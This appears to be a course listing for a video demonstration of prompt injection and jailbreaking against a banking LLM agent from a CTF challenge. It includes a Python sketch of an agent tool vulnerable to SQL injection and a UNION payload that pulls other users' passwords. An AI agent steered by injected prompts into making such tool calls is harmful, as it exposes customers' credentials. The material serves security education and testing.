Prompt Injection and Jailbreaking Techniques for Banking LLM Agents - Security Demonstration
Overview
Learn how to identify and exploit vulnerabilities in AI systems through a detailed walkthrough of an LLM jailbreak/prompt injection challenge from BSides London 2023's CTF competition. Explore real-world security implications as the video demonstrates compromising a banking AI agent built with OpenAI's GPT-4 and LangChain, revealing methods to extract confidential information through prompt manipulation. Dive into advanced exploitation techniques, including an unsolved challenge component that involves performing SQL injection by manipulating the AI agent. Refer to the Damn Vulnerable LLM Agent project and the Synthetic Recollections publication to understand the technical framework and research behind these vulnerabilities.
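To make the attack surface concrete, here is a minimal, illustrative sketch (not the actual challenge code) of the vulnerable pattern the walkthrough describes: the banking agent exposes database tools whose arguments are concatenated directly into SQL, so an attacker who hijacks the agent's reasoning through prompt injection can smuggle a UNION-based payload through a tool call. The function, table, and column names below are assumptions for illustration, not taken from the Damn Vulnerable LLM Agent source.

```python
# Illustrative sketch of the vulnerable tool pattern; all names are hypothetical.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (user_id INTEGER, username TEXT, password TEXT);
CREATE TABLE transactions (user_id INTEGER, description TEXT, amount REAL);
INSERT INTO users VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
INSERT INTO transactions VALUES (1, 'coffee', -3.50), (2, 'salary', 2500.00);
""")

def get_user_transactions(user_id: str) -> list:
    """A tool the LLM agent can call. Vulnerable: user_id is string-concatenated into SQL."""
    query = f"SELECT description, amount FROM transactions WHERE user_id = {user_id}"
    return conn.execute(query).fetchall()

# Normal tool call the agent would make for the logged-in user:
print(get_user_transactions("1"))      # [('coffee', -3.5)]

# If prompt injection steers the agent into passing attacker-controlled input,
# the same tool exfiltrates other users' credentials:
payload = "1 UNION SELECT username, password FROM users"
print(get_user_transactions(payload))  # includes ('alice', 's3cret') and ('bob', 'hunter2')
```

In the real challenge, tools like this would be wired into a LangChain ReAct agent and the malicious input would arrive through the chat interface rather than a direct function call; the point is that any missing SQL hygiene in the agent's tools becomes exploitable once the agent's reasoning can be steered.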
Syllabus
Prompt Injection / JailBreaking a Banking LLM Agent (GPT-4, Langchain)
Taught by
Donato Capitella